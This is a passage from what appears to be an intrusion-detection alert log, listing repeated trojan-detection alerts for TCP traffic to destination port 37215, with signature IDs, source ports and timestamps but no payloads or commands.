                  SID:2835222
                  Source Port:45712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.412825
                  SID:2835222
                  Source Port:34806
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.613798
                  SID:2829579
                  Source Port:58408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.011006
                  SID:2829579
                  Source Port:38800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.597424
                  SID:2835222
                  Source Port:47178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.258130
                  SID:2835222
                  Source Port:42432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.354266
                  SID:2829579
                  Source Port:36486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.662577
                  SID:2835222
                  Source Port:50622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.151496
                  SID:2829579
                  Source Port:47436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.482500
                  SID:2829579
                  Source Port:39472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.510186
                  SID:2829579
                  Source Port:47130
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.306995
                  SID:2835222
                  Source Port:57074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.587332
                  SID:2829579
                  Source Port:47570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.351909
                  SID:2829579
                  Source Port:35878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.433517
                  SID:2829579
                  Source Port:54968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.389862
                  SID:2829579
                  Source Port:35426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.933010
                  SID:2835222
                  Source Port:36408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.794548
                  SID:2829579
                  Source Port:34422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.826099
                  SID:2835222
                  Source Port:52146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.144985
                  SID:2835222
                  Source Port:55466
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.991473
                  SID:2835222
                  Source Port:33370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.811202
                  SID:2829579
                  Source Port:50566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.352655
                  SID:2835222
                  Source Port:51576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.417539
                  SID:2829579
                  Source Port:42556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.066216
                  SID:2829579
                  Source Port:45402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.557842
                  SID:2829579
                  Source Port:52378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.573004
                  SID:2835222
                  Source Port:47996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.314829
                  SID:2829579
                  Source Port:49924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.651870
                  SID:2835222
                  Source Port:52598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.278007
                  SID:2835222
                  Source Port:45404
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.635714
                  SID:2829579
                  Source Port:53266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.778927
                  SID:2829579
                  Source Port:50644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.444805
                  SID:2829579
                  Source Port:55080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.444805
                  SID:2829579
                  Source Port:37874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.839060
                  SID:2829579
                  Source Port:42904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.603168
                  SID:2835222
                  Source Port:46382
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.918557
                  SID:2835222
                  Source Port:58902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.140242
                  SID:2829579
                  Source Port:53566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.492673
                  SID:2835222
                  Source Port:44348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.874672
                  SID:2829579
                  Source Port:51318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.844499
                  SID:2835222
                  Source Port:46946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.150290
                  SID:2835222
                  Source Port:55792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.854360
                  SID:2829579
                  Source Port:41170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.962280
                  SID:2835222
                  Source Port:49740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.855576
                  SID:2835222
                  Source Port:48960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.545606
                  SID:2835222
                  Source Port:44270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.209381
                  SID:2829579
                  Source Port:58876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.573004
                  SID:2835222
                  Source Port:38074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.021127
                  SID:2835222
                  Source Port:58342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.629706
                  SID:2835222
                  Source Port:48608
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.521330
                  SID:2829579
                  Source Port:43772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.775037
                  SID:2829579
                  Source Port:39300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.758837
                  SID:2835222
                  Source Port:52206
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.861784
                  SID:2829579
                  Source Port:56100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.965651
                  SID:2829579
                  Source Port:42412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.762388
                  SID:2835222
                  Source Port:56678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.433222
                  SID:2829579
                  Source Port:35520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.529924
                  SID:2829579
                  Source Port:60832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.835000
                  SID:2835222
                  Source Port:56772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.789952
                  SID:2829579
                  Source Port:48700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.202675
                  SID:2835222
                  Source Port:49374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.449371
                  SID:2835222
                  Source Port:46852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.482835
                  SID:2835222
                  Source Port:58822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.561007
                  SID:2829579
                  Source Port:58586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.056369
                  SID:2835222
                  Source Port:44868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.429135
                  SID:2835222
                  Source Port:48740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.179104
                  SID:2829579
                  Source Port:37214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.563571
                  SID:2829579
                  Source Port:42026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.814365
                  SID:2829579
                  Source Port:47248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.831289
                  SID:2835222
                  Source Port:49366
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.831621
                  SID:2829579
                  Source Port:55278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.766874
                  SID:2829579
                  Source Port:58836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.819736
                  SID:2835222
                  Source Port:60782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.227550
                  SID:2835222
                  Source Port:34928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.590105
                  SID:2835222
                  Source Port:44514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.148384
                  SID:2835222
                  Source Port:45384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.885671
                  SID:2829579
                  Source Port:53450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.349992
                  SID:2829579
                  Source Port:49282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.289200
                  SID:2835222
                  Source Port:56650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.124417
                  SID:2829579
                  Source Port:33834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.230409
                  SID:2835222
                  Source Port:33470
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.162880
                  SID:2829579
                  Source Port:45446
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.873378
                  SID:2829579
                  Source Port:44870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.156196
                  SID:2829579
                  Source Port:41276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.306994
                  SID:2835222
                  Source Port:50914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.876490
                  SID:2835222
                  Source Port:49844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.230730
                  SID:2829579
                  Source Port:56988
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.530695
                  SID:2835222
                  Source Port:45388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.924578
                  SID:2829579
                  Source Port:35972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.088897
                  SID:2835222
                  Source Port:43252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.181410
                  SID:2829579
                  Source Port:38468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.002898
                  SID:2829579
                  Source Port:47096
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.012780
                  SID:2829579
                  Source Port:44204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.346552
                  SID:2835222
                  Source Port:32828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.218998
                  SID:2835222
                  Source Port:43560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.182534
                  SID:2829579
                  Source Port:59228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.535302
                  SID:2829579
                  Source Port:33136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.387437
                  SID:2835222
                  Source Port:45056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.355294
                  SID:2835222
                  Source Port:60162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.111831
                  SID:2829579
                  Source Port:37100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.655668
                  SID:2829579
                  Source Port:35438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.166168
                  SID:2829579
                  Source Port:47936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.478959
                  SID:2835222
                  Source Port:48786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.838932
                  SID:2835222
                  Source Port:58220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.368496
                  SID:2835222
                  Source Port:33644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.518059
                  SID:2829579
                  Source Port:57200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.826871
                  SID:2829579
                  Source Port:47240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.829740
                  SID:2829579
                  Source Port:43782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.296944
                  SID:2829579
                  Source Port:50608
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.776288
                  SID:2829579
                  Source Port:57966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.637294
                  SID:2829579
                  Source Port:33740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.562058
                  SID:2829579
                  Source Port:48300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.821863
                  SID:2835222
                  Source Port:49542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.516859
                  SID:2829579
                  Source Port:34006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.115702
                  SID:2829579
                  Source Port:54462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.855669
                  SID:2829579
                  Source Port:38898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.652707
                  SID:2835222
                  Source Port:44790
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.862601
                  SID:2835222
                  Source Port:39848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.342847
                  SID:2835222
                  Source Port:53962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.034911
                  SID:2829579
                  Source Port:56476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.172380
                  SID:2829579
                  Source Port:60722
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.757410
                  SID:2829579
                  Source Port:39426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.854453
                  SID:2829579
                  Source Port:45384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.804395
                  SID:2835222
                  Source Port:41006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.790655
                  SID:2829579
                  Source Port:57380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.823696
                  SID:2829579
                  Source Port:55090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.406012
                  SID:2829579
                  Source Port:33754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.575874
                  SID:2835222
                  Source Port:42858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.110610
                  SID:2829579
                  Source Port:59446
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.954734
                  SID:2829579
                  Source Port:34668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.954473
                  SID:2829579
                  Source Port:37650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.950899
                  SID:2835222
                  Source Port:40748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.992433
                  SID:2835222
                  Source Port:44788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.280858
                  SID:2829579
                  Source Port:47580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.936367
                  SID:2835222
                  Source Port:56840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.529956
                  SID:2835222
                  Source Port:53006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.794686
                  SID:2835222
                  Source Port:55190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.522324
                  SID:2835222
                  Source Port:53650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.982292
                  SID:2829579
                  Source Port:57840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.896648
                  SID:2829579
                  Source Port:57094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.443914
                  SID:2829579
                  Source Port:47698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.873449
                  SID:2835222
                  Source Port:39464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.439575
                  SID:2835222
                  Source Port:41576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.012049
                  SID:2835222
                  Source Port:60286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.421271
                  SID:2835222
                  Source Port:45604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.017294
                  SID:2829579
                  Source Port:50330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.881765
                  SID:2829579
                  Source Port:45342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.951941
                  SID:2829579
                  Source Port:47994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.576804
                  SID:2835222
                  Source Port:45826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.866153
                  SID:2829579
                  Source Port:44356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.959708
                  SID:2835222
                  Source Port:51998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.769630
                  SID:2835222
                  Source Port:44846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.882178
                  SID:2829579
                  Source Port:56776
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.890246
                  SID:2829579
                  Source Port:41848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.875602
                  SID:2835222
                  Source Port:37724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.523426
                  SID:2835222
                  Source Port:52664
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.328153
                  SID:2835222
                  Source Port:55286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.415426
                  SID:2835222
                  Source Port:45138
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.926609
                  SID:2835222
                  Source Port:54332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.592931
                  SID:2829579
                  Source Port:50466
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.420167
                  SID:2829579
                  Source Port:53778
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.766150
                  SID:2835222
                  Source Port:34292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.680054
                  SID:2829579
                  Source Port:46940
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.435544
                  SID:2835222
                  Source Port:38048
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.317652
                  SID:2829579
                  Source Port:55032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.938620
                  SID:2835222
                  Source Port:34558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.491395
                  SID:2829579
                  Source Port:36548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.555542
                  SID:2829579
                  Source Port:40228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.159705
                  SID:2835222
                  Source Port:49898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.548178
                  SID:2835222
                  Source Port:48064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.795318
                  SID:2835222
                  Source Port:43586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.408951
                  SID:2835222
                  Source Port:47472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.245284
                  SID:2829579
                  Source Port:42884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.850354
                  SID:2829579
                  Source Port:60968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.997366
                  SID:2835222
                  Source Port:33344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.085060
                  SID:2829579
                  Source Port:33692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.164122
                  SID:2835222
                  Source Port:46296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.517899
                  SID:2835222
                  Source Port:39290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.441172
                  SID:2835222
                  Source Port:57450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.870902
                  SID:2829579
                  Source Port:51296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.415426
                  SID:2835222
                  Source Port:38394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.058542
                  SID:2829579
                  Source Port:48346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.213078
                  SID:2835222
                  Source Port:56562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
